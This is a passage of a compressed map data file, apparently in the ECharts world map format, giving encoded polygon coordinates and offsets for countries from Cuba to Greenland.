đ\"],[\"@@ƋØĆĶƝ\"],[\"@@ӚKİďж¢ʈƅҜ³ҚЕӸࢤӍŞQïĎðc̔ȑȅĨŇźĘȚɑ२ȁńĭŅɽۼÁ̴ɡ̄û\\\\Ľ߳ɡĚśīܱĆಳœԤҬŁȤݗĲ̽ʖȥҎՉMܻʌɉɂҥ¥űǎċƃӃĔȓƤ̰ĠŅƨݱbաϹѫ«ŉȑЅƕBż͕ÕҼǾʮˆʎڎʨஜǐ\"]],\"encodeOffsets\":[[[-84543,22090]],[[-79533,22479]],[[-79748,22659]],[[-83801,23719]]]},\"properties\":{\"name\":\"Cuba\",\"childNum\":4}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ȳèƍȨ΂ˏ\"],\"encodeOffsets\":[[-70401,12350]]},\"properties\":{\"name\":\"Curaçao\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ɚʡuÐ\"],[\"@@çSƎ°å\"]],\"encodeOffsets\":[[[-83322,19814]],[[-81739,20186]]]},\"properties\":{\"name\":\"Cayman Is.\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ѹÃýƌϵÙǧìƖRÀǮ֔ߖʶԩ̳Àȑ\"],\"encodeOffsets\":[[34821,35907]]},\"properties\":{\"name\":\"N. Cyprus\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@Ǩë϶ÚþƋѺÄÛ̍eׇͳҹƆōȌ_ňΊö\"],\"encodeOffsets\":[[33498,36016]]},\"properties\":{\"name\":\"Cyprus\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@òFòrVņ࡜ͷɲŚçǫųήˑ̎Ŕğǆ҈ơʌ¬ÙǅȺŧźÂ҆ſɪ̱֟ɇÙǉ˝ƩԻƵȯ΅ǔУࠫȲ́ͯաFȟƒ¤í¼řêęGnП̒ȡìʓ˚ĺŚ΍θ@m´ÁzrȴǀϼĈƒhী͜£ŜȎ^zGS·oÆcFrXb\"],\"encodeOffsets\":[[15165,52080]]},\"properties\":{\"name\":\"Czech Rep.\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ɭćȼ̶ǩ\"],[\"@@CďѣŬ̸˒řªƩ\"],[\"@@ʂŵŹǝܨſʀÂIǕǓęĚáМ§װȊϸʤϠ³ΚɧɶXŢʥͦĻƣĮɭCÉCcýÙáŻÿU¯ŀăɖŗĘį¥ć_ÑhÄyÔƗųȽŘǣyé^iƲ»~yx˷ñēŗIYWaqEÅdpT¸yH]ȍ¤śি͛ƑgϻćȳƿyqÂ±n@SQ@ǤōǾɑĹřʔ˙ȢëР̑mĚHŚéî»£WgIŁYʣK]SYM¥Ɲñ¿ě{ϣǏǌǻ±ƗƀÉKÙaÑc}Cõ~ÏulCv`bsí~Џ¤YQN¿cw॥ȏ½JñÔo~DhŋHépƧKTő©ƻñdîœ|A~Itur¿ō ùpȋ©ߛɄŗTsUĎN^MH[W[åWqa۳GBӄѦۈֹƮ׷R͡ʖŤ̄ʁİÇ¸y¼NðȌ˦̇ʤ°żǅŀɮİÌʬȿ̒ܐƒÛĨʾʦʋìź˔ƒՎĻǐǰǠ؊TČȉŘmôƊƌǱļИӲeӠʩЅʰ͡Ě[ʞɿþ˜Ĩɿξ࣎ß\"],[\"@@ŦɦÓŽɀOˑė\"]],\"encodeOffsets\":[[[14539,55214]],[[14039,55688]],[[9974,56142]],[[8508,56102]]]},\"properties\":{\"name\":\"Germany\",\"childNum\":4}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@˕п̩æٓčKצӰپ~zv|OȌŏÂ¸Ŭ®dAĺĤȤ˻xɳثѿıX¾ÙϬüǠõ\"],\"encodeOffsets\":[[44284,11776]]},\"properties\":{\"name\":\"Djibouti\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ÿké΀ƴęIɹ\"],\"encodeOffsets\":[[-62752,15615]]},\"properties\":{\"name\":\"Dominica\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@͆ívŅʷ§ΟŨpƘʬ£\"],[\"@@α§žŲɴĉ\"],[\"@@ɉhsƎɾƵ\"],[\"@@ĥĎˢʰǻͽ\"],[\"@@͹äæǎ̰ŵĻ\"],[\"@@ŠЏ˽íϡĬŅ̐چĂ\"],[\"@@ĩ¢ľÈë\"],[\"@@̓ˋǖƯ˕ĉ̻ǁǩΐ̯dʵѢ̀ʰǢǊɑ ɪ̒Ŵ̠¯Sɻ\"],[\"@@ƭTʨ¼ĹÏ\"],[\"@@࣍à¯ўНƴࡎѐģǼȪƮ¸Ŋû¶ʼɗHȃʓʭ»ƹǀˮɒۄÂѼ΀ծƀ˝भզƫơǛι{ŕ̇ɻkĶçεɣäȑǽȏɺÑPţ\"]],\"encodeOffsets\":[[[11635,56210]],[[12851,56285]],[[10303,56204]],[[10992,56065]],[[15450,56343]],[[10901,56945]],[[12970,56931]],[[12871,57124]],[[11318,58627]],[[9974,56142]]]},\"properties\":{\"name\":\"Denmark\",\"childNum\":10,\"cp\":[10.2768332,56.1773879]}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ċøǜǜk~ĤŊ״ÆٖɳȦǼ̹юw̻Åcõ߂ǳ̄ʗ̇ͫȻǊ˷зH׫ȏƑĴ͏ÁΉՙǉŜŗɠHƐxÊsÐġÚÉĄ»ð\\\\XĶHļĴbÐM¬ÕŌƈǬ\"],\"encodeOffsets\":[[-73366,19657]]},\"properties\":{\"name\":\"Dominican Rep.\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@Ţŵ׳CɃēăçĳėȵؙչj̥˾ҝȢįȄїװЃĮϛÂȻʜ१ǫĩж޿ĢୡƗϣŖי͡ʟɡҬ؟ɊحŠėʒÆےȥϰڝ␣ᕧ൩୧ഝ˯ܹſȣĮŖʶĿτ௏Ѻ×ƪϏɚiʆ᣽ၮ᜿༸ἡኒ@̸@Ȳpیত֤¸ʈǎʊcĎeĶ]TÞæƊЎVҲŀžĒĨĜǲʤǄòɀÖǦÖƤĢѮǈǧǔG˄ÎƬÊTĄYƒd΢Ŋ|´ƘÊ೶^ĦʺªźÝ´ĝÈ±zćæ»þǒŇȶĭஶ˯Ȃ¹¸yØҞâ਺֮͆{̢ˤֆʀഺƂ͊ƸڲĤࠖ@ҌȻৈπφƓʾ¤ľצȣ֔ærēͥ˃\"],\"encodeOffsets\":[[8405,37396]]},\"properties\":{\"name\":\"Algeria\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@šm¤ȰŦîƠ³ȇȻ\"],[\"@@āà¬ĳ\"],[\"@@ǅn˒ǖŋȃ\"],[\"@@ǩĄVĂɚĆÜƣšħ\"],[\"@@ƹbƆƾ|ǣ\"],[\"@@ʙÂòĢǨƣ\"],[\"@@ЈٷęǁȍáʍpÛŖ̀ʪȽɬ¹ɞƗtȢļøč\"],[\"@@çüÈSě\"],[\"@@˻_KÒÐ£ÈƇƒƳṬĉ]vw`YųӍѥԏӷί঳Ι͉ЫĕÚʫ܏ˁƧđ¥e³X¡I±_i½kġåB¿|Ëô³ØĄ]Ō½»ÕYïQ¡~ı²čÀÙ·]ăė÷D¯S¸úńčFIa¦jº¬Œu´rf¥ˢåǂ̤ȘȞӢĥіéЗĕQpǠɹ̑խπƠˬţܚ̊ȘĊɚƢǗɄμѲՈূΠȾ֮ХДŋȢǛÒȯݶƃȊǠд̋аǑ\"]],\"encodeOffsets\":[[[-82054,-3044]],[[-92594,-1372]],[[-91564,-932]],[[-92502,-790]],[[-93620,-471]],[[-92747,-342]],[[-93462,26]],[[-80803,1283]],[[-77091,-109]]]},\"properties\":{\"name\":\"Ecuador\",\"childNum\":9}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@քนƕǥ˱੉ƯɃϭʄљѪֳ஀ǥ˿Ҏࣅղ֕DʓʦΟĢ҉ਠᆣӸҋȱcšǌ۩҂ˉբՍ⮿AªŸï°ŝǙƗOᢱBᢳ@@᳾@ᴀɵࡦɐВĝրʢːȚšіĜଖȱʖƑࠎƋҴȁܞͬʖƢǘѺĠ̡ųςæŠψŧ̬êȺǙȳŢķǅ˦ǗưĜÅþ͘ȋࣂ¾ҀǊ¢ĩ\"],\"encodeOffsets\":[[35068,31958]]},\"properties\":{\"name\":\"Egypt\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ɐĭΣwêļgŋÌbŨƺǋ\"],[\"@@ąħ´ä\"],[\"@@ĳňԉˎ׃Ę˫µ¿Ē½ ¥@yƷĕʵµÕHǭȆǿò·Ö¹ÁťĥɁ¹œßƣqIZȿʠțƳǳŏOŗ£eCʎkǊoǠkǊŞȖ̈޺sˠúƨEÈhż\\\\ªDĞgȮj ¶ưȢŔЄł\\\\nj¶v¤ĚǀƴΦޛɞএФڟà̄˺ϥࠆͥКՙӲͩż̿ľRɰ̙Ƣ³~üêÙĭģĹcB«·ūÁȋŐ{Pu}yõĔÃüùĠƵĤûŦāƄͷˆΣО\"]],\"encodeOffsets\":[[[41105,16073]],[[41039,16469]],[[41922,14319]]]},\"properties\":{\"name\":\"Eritrea\",\"childNum\":3}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ąƏƧĬɮ¤\"],[\"@@˯ɯwĉǰłƆʂM\"],[\"@@ŝĄÈðżýåõ\"],[\"@@ëȓȩŧȻ˨ڂȤǯǏ\"],[\"@@ŕħƅɔĬȔЬŬÑПɥë\"],[\"@@ƓɞÒðǞĵěȗ\"],[\"@@ťŨ̢Ȋ]ȗȧā\"],[\"@@ǁA~ĆƄă\"],[\"@@ȅ]ŀƪǺºçƭĵ\"],[\"@@ˈý͛ͫɭìċƂǛÃŉĀڐͰ[Ư\"],[\"@@ΩĮ[Ė̼}Êǅ\"],[\"@@͒Ɨ¥ƿƈ¤׶ʩ৾ğÆžؚȽ[¡ģîJƠ¾żÌĖÕমàХȱƩޟЕࢥȍˋȩƪčʛěޡँĺϧ΀ʭ؇ωʙҟĀśԙÏˁƣЃԡ቉·ʵǱйéǃʍɝğΑƌ˿ϘƖɶƭçϽϔҕċҤФϮůMȥɶ̄ԊҍԘΘjŤĮâȊŗŪȈƨı֔׺ѮˣŠÛɨѹɍŭؽkħ˚ѕǑġƐǒƚĿXðłçȔȃĘǢʵƮ´ǔްɞOŠɄĬтϊƻ৸ú૖ȕޘĔҺŭƜêҎŃҘä\"]],\"encodeOffsets\":[[[-18317,28478]],[[-15770,28823]],[[-17597,28695]],[[-16726,29062]],[[-14537,28846]],[[-18262,29178]],[[-14045,29606]],[[1633,39601]],[[1480,39853]],[[3221,40746]],[[4397,40799]],[[-1837,44450]]]},\"properties\":{\"name\":\"Spain\",\"childNum\":12,\"cp\":[-2.9366964,40.3438963]}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@צƝӿȁ̝[̿ʉǈȊʱĜgȢيľ\"],[\"@@ȟĠȊUVĉ\"],[\"@@͋ŗōƤ̕äӾŦɖą\\\\Ə\"],[\"@@Ŝğ׻ӱÌӇɶ̍ȣÑţŏ¡ś͕æηßȟÐ՛ˎ͗öƋ®շŽăJǦОΏó̅ĂɑʢƠňȽŐÀɴӶĄʠƲࣂ¤ÆĲ௺ǁࢌ\"]],\"encodeOffsets\":[[[23161,60029]],[[23904,59956]],[[23474,60239]],[[28685,60912]]]},\"properties\":{\"name\":\"Estonia\",\"childNum\":4}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ÖGʶ¶ƸĖz¦@¾Àđˬ¶ׄėԊˍĴŇΤН͸˅ĂƃüťƶģúğÄûöēӯٽLץٔĎ̪åɟͱƺͭ˸˓ʪст̵ᠴ࡙ࡀ@ᢋᣭߝͽăϩǯɥˏ۩ƻĝę­ūBɋ_ğcŵCǙĨɋǺޡΟ©ąŏƩƍķݗŦſJȏ\\\\ś~޳ԘȽƂݑ´ɑ˸MŤnžl¨±ǀΙj½ @Hʅ̬ɯڬիӆƉʄݻ͠ʂҌ֢NĴĐJޔȞؖϾȒȆǘőƈĲƲߞҸڴϤŒͰాfDŘ¤ŐPǴȜƴɀʟYrJÞƤ¼ŔĤɂÄŦº¸ÕȀñǮȅ\"],\"encodeOffsets\":[[39354,14775]]},\"properties\":{\"name\":\"Ethiopia\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ȬÉ¯řʃĸĈì\"],[\"@@ų¥ÙŠȎù\"],[\"@@ǖƋƛłŒ\"],[\"@@ɫªͦZĹÃ\"],[\"@@ҩı̞Áʩ̏ǶʣֆŅզͥޟٵࢌও͗ďĝ́ȀēȇƩЀǟ˓ЈȱSƭљʉৄѵ̒˕̅ͻహ޹ལࡓਖ਼ĽǲǉǙΟ¦äŏɷ×ďÈ৯ʿࠛωƛƬǦʋǀƋŷʋyĺ̐९ǺƜ࠶̋ͰĥـюʦėƒٲĘǴ˴ࣈؘٖͤ߬¸ºԴ֡ǈǂЇ­ϣϔʎҸ̇ˌþʚɻƺдڇΎܙźିѠόJ@ƢѸºۊҭގÑѾƂࣴǳڴͬ˘מϠȊԐQԶƄ୨ͥǈǕХʝĶŽ\"]],\"encodeOffsets\":[[[22708,61820]],[[21966,61983]],[[21727,64760]],[[25445,66551]],[[29662,70679]]]},\"properties\":{\"name\":\"Finland\",\"childNum\":5}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ѻŭ͂ǀź\"],[\"@@ăÒ¬òƃ\"],[\"@@ʾɽÜέױƷՑƾµǶȬ˘˂Ŷϲb\"],[\"@@đAĒƮ@ƫ\"],[\"@@s@²@ê@ŞĈĩȥ\"],[\"@@ÏĊĞyÑ\"],[\"@@λϿHġ̦ȔCȍё½ǻĀǏƿʧÛǫǂðƔȆSغ͎ϔĆ@_\"]],\"encodeOffsets\":[[[182772,-19429]],[[183654,-18536]],[[182559,-17788]],[[184320,-17370]],[[-184294,-17331]],[[-184247,-16898]],[[184320,-16556]]]},\"properties\":{\"name\":\"Fiji\",\"childNum\":7}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ŤQÑŷǓĜł®\"],[\"@@ݲĒĴÉչҕ˙cęŹ˩¡ɳŌ؈ʈ˿º˲Ö˕ʀʂĕ\"],[\"@@ƍĬǤwó\"],[\"@@Τ¯éƅȦùZƂʄƘőŷÅƚ«ݡʥ~ƍҗæņŽɯm¯ĥɅƤàǬјȬǌȸȆ\"]],\"encodeOffsets\":[[[-62483,-53028]],[[-61733,-52697]],[[-61554,-52629]],[[-60262,-52500]]]},\"properties\":{\"name\":\"Falkland Is.\",\"childNum\":4}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ιÆŉǺàż̎EƬșǛ\"],[\"@@ġænȲŌċȋ\"],[\"@@֥݇ɋչˏˉܩŦ̥ȟʫòç¢jqZXRNB¦ÖìŪɄ¼ĖtƨŨ`ŀƤ®ĄsƲˇΦŇڂҼ޶ࡪ˿ԞНƝĖüƌũ²̫ƦʄƦӗ\"],[\"@@ȥw¬ŔǝȸʊýĎɕ\"],[\"@@ãJ¼Ĥhĭ\"],[\"@@ƛ°Xʘǐëɛ\"],[\"@@ǍC¨ɺʤȿŽu\"],[\"@@Ð֧̩س͇ǠäĦɟȘâƐœɚȾɀмĘ¦ʮİǱ\"],[\"@@ñƥȞǮū\"],[\"@@Þ_zY~mªQÀR~¾\\\\Ǝ͢ʕ׸QֺƭѥۇAӃɭƅǧ´ƗÉ¹Č¯@akiwŋēŏėkmƗ±cƣʹǩWĳkƗŁÅBÁQäJĨŞò¾ĜŲNưk\\\\ȿŀĩ´¦·dȗƹ̘̟ÉšϋƟ̜ȫýЯΚǓˌvŧͭޡӋϡŁ׫ž̅Ǽ̇ÑکǄյ̵ǧɷƆПভßĕÖËŻHĎšÇPÕؙȾÅŽ৽Ġ׵ʪƇ£¦ǀ͑ƘʺƀȪ࠸ƚŊÛØýćƒܮ҂ҁȯϾͽȸƐvĩӐ՟ǢɭʜȒƫŀƚĤʈµțĂѹBÜƆ˽cĤ౱ǔ̯Ǽ̌ŌȹĴˮ\\\\БºôȚƚદȆҐʯȸĤϊÅĈĪѼǃŸcͮɭКԈGĶʕࠌûӤŸʋº¶ǎࢸʞ̆ɈäՐܒǲȠ̅̈|ƔȻ˔¯ĀƝТ¹sɳͬUɰǊ¤̩՞ɷʂx\"]],\"encodeOffsets\":[[[57137,-21851]],[[46265,-13288]],[[-52892,4159]],[[-62286,14843]],[[-62700,16272]],[[-63067,16392]],[[-62799,16620]],[[9708,43833]],[[-1206,47006]],[[5929,50728]]]},\"properties\":{\"name\":\"France\",\"childNum\":10,\"cp\":[2.8719426,46.8222422]}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ÐýəzǊÄ\"],[\"@@qœƹvĬƗϓˬҔµ\"],[\"@@ś«SŴŰć\"]],\"encodeOffsets\":[[[-7359,63631]],[[-6790,63722]],[[-6559,63753]]]},\"properties\":{\"name\":\"Faeroe Is.\",\"childNum\":3}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ōY£ŦƈLjŗ\"],[\"@@ÛåĴƤý\"]],\"encodeOffsets\":[[[162115,6978]],[[141459,9729]]]},\"properties\":{\"name\":\"Micronesia\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ķ̻ґՔƜˤ¡ȾϿęɷ̽ɩ÷ҵԪ̵÷ેȅ˝ŗǥŗętŹ˞ɥɍЉèǕ͌ǟĘƃđ^ͳ͏éϫÐÉгȈūǍȀš¯̅ǋaƳƌɧƝĕȍڃݺԿҞ˸éοƸ˙϶ƸPǽÐȓѠʂ˕ƶÞǥ¨ǆţµśì̥רȴć̌˴¸׎ĨƷˠīǤŴϣĐȅɌƞĦĺówϤ^zzJ²Iz£`wĒமEѼG՜hŎǰFඊÖā\"],\"encodeOffsets\":[[13613,2214]]},\"properties\":{\"name\":\"Gabon\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ƻďʽàɀĜȺë\"],[\"@@Ů_˗ƟǍɄɆĲă\"],[\"@@γ{̛̈ˉɯʁVїɪ̪ƲſĔ̢Î˨˘زŰτăˌ˝ƉƩʞnĦƍǛ¤Äɵ΋ȅǗ\"],[\"@@ȏ\\\\ȔǴɕ\"],[\"@@ÖȡȿófƔǣÙ|Ģˬĺ\"],[\"@@ďà̆Ȏȵʭ\"],[\"@@҇§ƤǔŭĸƸ˼Žaū\"],[\"@@ƉɠŦSdɋ\"],[\"@@TǇϴ½ɵǧïƀʍBρȪϤȘƊƕ\"],[\"@@pű˩Ìʺæ\"],[\"@@̗ɩňÓҵɫčÄȐĠȓɒ̠N§ĦҐǜś\"],[\"@@đǍٷ̣ěƮɷȭؚŌૢKʘȓڽދ׽ǕΦǰŧֿȍΩÊجťϘÚϞĽЮ˧Τܯ८ӯķă˒΍͕ņ͝Y̮ӄ̙îƧʻɇȠąɼƄиOԐǥøʅŽ̝̋ůƗνÕŜƃϻęࠬđaƱοɋ։ų࣭UՋŎèÛƵÕћmIĹߵĨͽëɳͣѝź҃đ͟ɃчX஺ड़ࢪ`נҊܡ̍ԇǜ˿mŦúʛæџĩɡĪ]ǬߺˠȦɜķ̾ӧğΒ˴ۺǒˤãƖˆį˅ǠȀԺˍMͻ˶ĘʲάưћI΁ƕܡÆÿſķÒŝȌиѠǏ̺ʌÆɓĦĜΫɭŦʾ˛ǝũԙƥ¯ȐϾėɆΠנϷȏЗƦ͸Ŭŋ¦ʦˤțŪǴƘƍĺŘǴϜ@ɍǂÚƚˤpQʰӬ­তŘǦ]³ĵ\"],[\"@@ɜĻҍÄlƆɆč\"],[\"@@ɌýȹӇRɴ̻ňʐ¦ǓƌǪĬ²Ó\"]],\"encodeOffsets\":[[[-1091,51907]],[[-4297,54602]],[[-6367,55387]],[[-5227,56780]],[[-6275,57273]],[[-6113,57155]],[[-5916,57697]],[[-7423,58487]],[[-6292,58886]],[[-7378,59068]],[[-6347,59765]],[[-3184,59920]],[[-3130,60447]],[[-1339,61991]]]},\"properties\":{\"name\":\"United Kingdom\",\"childNum\":14,\"cp\":[-2.5830348,54.4598409]}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@˂Ə®³SïûÑēẂĜڱɠÁuǹŏsYƑe؝Ýէuȑ«Wz~nmhûųĪítÒ^ÓNÙMaOoWčĳғ²ďÁRß~ĿvÇhǈǂ¾ɞɱׄշͺ̽êПɰÆ¼ÌӂgʚīŢɲĒµĶ³র¥ȚßRö»ЀŧÄƈ½`eEsUlmÆmŎI zĊlȐòƨɠōâŊjTÔuňöeƶũȂLŤloýȫH}ӘǷǾĉȷǃĸǍ\"],\"encodeOffsets\":[[47417,42504]]},\"properties\":{\"name\":\"Georgia\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@àāă̇ϼ͍ĭիàğşʘÃҡĭû˂ͻƽڷŔǉĝхǰͯϚ̧ȥɻׅ«ቕ࠵थ˜ʢÄ¼ɼƘǣĤȓࢎɤפƜВĸø°rZePxÖpÿӼ£ƀÌ³jʲTŊU¬¹ľ]ôU־Ļƈî΀ຌXΒéˠȪȘ§\"],\"encodeOffsets\":[[-70,11383]]},\"properties\":{\"name\":\"Ghana\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ħǥǔƷ̺ǆȊʳκ˂ѪƵͬȎǬ̐¿ȎЕGȽ΢ʳɣ̛ˢeÐщɔƏbƅƏǃdБȮãmȏânĽÁYǋȚťpɣŅüŉVʃmO¡WŻÜþWùĭǯVě÷ƛuǕ³ơŊȗΧȑ̃ǘĀʎůդɛǈʁěéøï§GÛV]đĳ½ŇLs\\\\Æƪʌī̸ģng\\\\Ex¾ŜJzÙĄʏͶőŜq¬Ëf՗GșįʉnŉǋǕ˥ǝġĳǋǷiť̸ɉĬBͤŉȍɈ͍ĜƵʪbǼëßĉȰģóƑÛPĘª°äƒˬºÜvàFŸŀÖÀ~ŤOƚZȄÒDȊM¦ßŏľ¾Ìń`òǺ¹ĬHæլlťŊ҂ǉࡔÄ\"],\"encodeOffsets\":[[-11662,12703]]},\"properties\":{\"name\":\"Guinea\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@½ɸžŒɌǣࠤǖשiǻĕǭȴࢬAèŠˎîמʷήŴŕΛƟݻːŕƇѷÑiƗۃEĩ÷\"],\"encodeOffsets\":[[-17165,13378]]},\"properties\":{\"name\":\"Gambia\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ËovŒġ\"],[\"@@Ĺ°Ɯê¡ř\"],[\"@@ķX¸ĸÀŏ\"],[\"@@©ĻĩİƔL\"],[\"@@Ń_½ËǰƙN¥CȉȃÑʽI¿}ĿÕŷßEu·ÛƓ˫­á«§ÒŌƗģLŀƩ¾ƮĽ^΀ǀƁöƵÓõĠĴ͜łܧƵlŶǽiǃŒêƼǉɱŴ°TŖaĖhƦÚĈ^ʰgɞ¬͈Ǆ܆GʆA˰AGåºīñǹ\"]],\"encodeOffsets\":[[[-16277,11349]],[[-16501,11325]],[[-16283,11741]],[[-16370,12168]],[[-14090,12557]]]},\"properties\":{\"name\":\"Guinea-Bissau\",\"childNum\":5}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@Fѻ஭đ_xy¤±JyIy]Pnõ¼ĽrΞڎwŠlȤtMT¯{Ġڼ@ʲ@Ȝ@H՛\"],[\"@@Ƥ@ŋȯ͹ȓUƼɬʶ\"]],\"encodeOffsets\":[[[11605,1566]],[[8946,3849]]]},\"properties\":{\"name\":\"Eq. Guinea\",\"childNum\":2}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@˄ºµċȶŕୂW¾ȍѺǊŻʝଫíûžȵÒܷĆmɸĒiÄŢĬĵ\"],[\"@@ėŐŸȈ̗\"],[\"@@ťƎĔǍ\"],[\"@@ŅzBǶѠɚŧ̳ȳŕ\"],[\"@@ĥĬØå\"],[\"@@ǅČúú«\"],[\"@@ɠƠŘ}ͷš\"],[\"@@īA˒Ĩǥĥ\"],[\"@@ċ]ŤŎŅ\"],[\"@@ơňĪã\"],[\"@@õāŢƎłjȕ\"],[\"@@ĉN¸àí\"],[\"@@÷ÐŴe»©\"],[\"@@´Ęɞˑŧ\"],[\"@@ċ¯ƇŎɔÝ\"],[\"@@É£úžoę\"],[\"@@ȘďǭÃɛâȲò\"],[\"@@ĘąƥǗǆÔØǒĽ\"],[\"@@{ÇəɦɎ³ũ\"],[\"@@ŰʿȥÓńĉ­Ǯʜ¦û\"],[\"@@ǝtČĠũȄ˄Ç˓\"],[\"@@ŏuŞɘMȡ\"],[\"@@ői¯ǈǂƝ\"],[\"@@ĠũԒƏŰέˀą©ť˗ŚƟɮ͝¬̞͍ͯÎ͚ƊƂÕ\"],[\"@@ƺɿęviď̡ĜƒİǙđȓĖ˒Ƥȶ\"],[\"@@ǋzȧʲɾNãėȚȡ\"],[\"@@åƥěðƿGŮ͊a\"],[\"@@ɑĞŪŴƫ\"],[\"@@޷ɤʽŗˇøͧȉˍpĔˡ̄ùŌƯίǰƻ{ȪǷiűʁɒȧǜ˷ؗЎtǈʗăϫآܣơ×Nƀȫ¤ŕƲŏлƛֺǥβʹʄÝ¶œIϳѥ̜ϷſϠρ˟ęνǬμँϋ̆ʏˋ̇ҬĿÁɅʹ̀ĆʴүъɼʰɊkƔŸ࡬̡˲Ɣٗʲďç̕²бùšƒwħǅV˿Ь˾lNŒͽL΋ʔġȀûĄćÌlBWÒÚOƨŰAÏĞ@zxXvr¢bǞªȊ̎ŲżÙŸRÚԤfªxŸ°ǶƲǆxʺĢlĸ¸ź̺SìÂŐH¼TĒYČB͂ÖlRp¶ˤEĐ~EɌǑȂRŞ£ĲÓ֠ÌŦÌh¦Uò·ƶllĀdĶwɖīǗʙƍBʅʗȑ\"]],\"encodeOffsets\":[[[24425,36389]],[[27829,36317]],[[23608,37059]],[[28512,36792]],[[26095,37267]],[[27096,37464]],[[27597,37609]],[[26480,37674]],[[27669,37847]],[[25886,37959]],[[26159,37855]],[[25113,38017]],[[26013,38318]],[[26655,38431]],[[25863,38503]],[[24941,38479]],[[27469,38719]],[[21390,38713]],[[25592,38666]],[[21108,39305]],[[26721,39136]],[[21184,39536]],[[25267,39741]],[[23978,39894]],[[27045,40274]],[[20560,40380]],[[26049,40943]],[[25369,41590]],[[26664,41705]]]},\"properties\":{\"name\":\"Greece\",\"childNum\":29}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@@ƢĞĝǯ\"],\"encodeOffsets\":[[-63196,12301]]},\"properties\":{\"name\":\"Grenada\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ĩķ΁ĈӪƼ½Ƌ\"],[\"@@ǧàǈĦ`ǅ\"],[\"@@ǁwŗǨȴǊΒÛ˫ʝ\"],[\"@@ּřŪǝත̉ԕŮѲ¾ƓÚँƢŎȤϸOяǈϬƸࣚģӆɕ\"],[\"@@ύ`ZĈδħ\"],[\"@@~ɥۇǗ͗ČறÇΘΪ࠸ڬƘ͘Ĺ\"],[\"@@Οò̼Ɯ¤ɍ\"],[\"@@ҥȑխž৔Ô\"],[\"@@Ԟ̷੹ƻˊܘö\"],[\"@@х͚Ǡɰʦ։\"],[\"@@ۓĘࢴȟË\"],[\"@@ࢣėЏŎॾǠјušǟ\"],[\"@@བྷɞѩʸܼచǯ¬ͭ\"],[\"@@ↂʭ㇓Ƨď㞆ƨպʁ᝚ȱಇʹ㏱ƍʵę̀ī෢Ġᗆ¡ܘʧৄʾ๠´ĜϽབྷەᰦܦᆦȯ૮͈཈ຶōࡈȍෑ̳૛ā§ȕቍǃۖūҩƧ೧áଝî؃ȷ঄۩ᅡѧԅߙܰǠ଺ǉpŹ׍ľѧÑϘȿ޴ūܜÉЙဏŤॅțӏĚΣ÷ؚŋ͞ʩ୒«ԂϱcӝߩŒএʓӫĆҎŽ׬Ģľρώ˶ζ@זέçəݙAͫũ઩ĜX˒͇ɛƾʽ๤ţš̗໳ȉݕňޥ̮ѧƋۿɀؖ˹੩ɏ৩ƶؔƿࡩġǶÏኔˠަ\\\\ᄄЭɍڣ๳͈ҽҐၷ˓༂ƾƎˍϽȡϜøᗨ׉ѩ̣ÀœĲƸҠȖߝܣÁ«ͮɇΡ՗\\\\եǘӹӖ૕̊ঢ়°gÿਫ਼«Čʟࠍțද΀ćßǑࡃɇᏚfęࠟțƪŏ̚Ǯ఼Ŷ༦ǵ୐[Cûعŏ_ĝۇ±łůҳEBūݥƭĆāԗɳڇǵᙡͅԳ\\\\ϗĳͷ¸Ġő̱³ଉ͂Ǝϑ࠯̩࢕ࠅࠫͻ֭ǆȦʧؽʹŭƪśǻͭæ̅Ƿқo֨֞݅æͼĽ̛͙͉ĘˈʡခŽԄǹ̟ǕˇýۥªĲțʼ 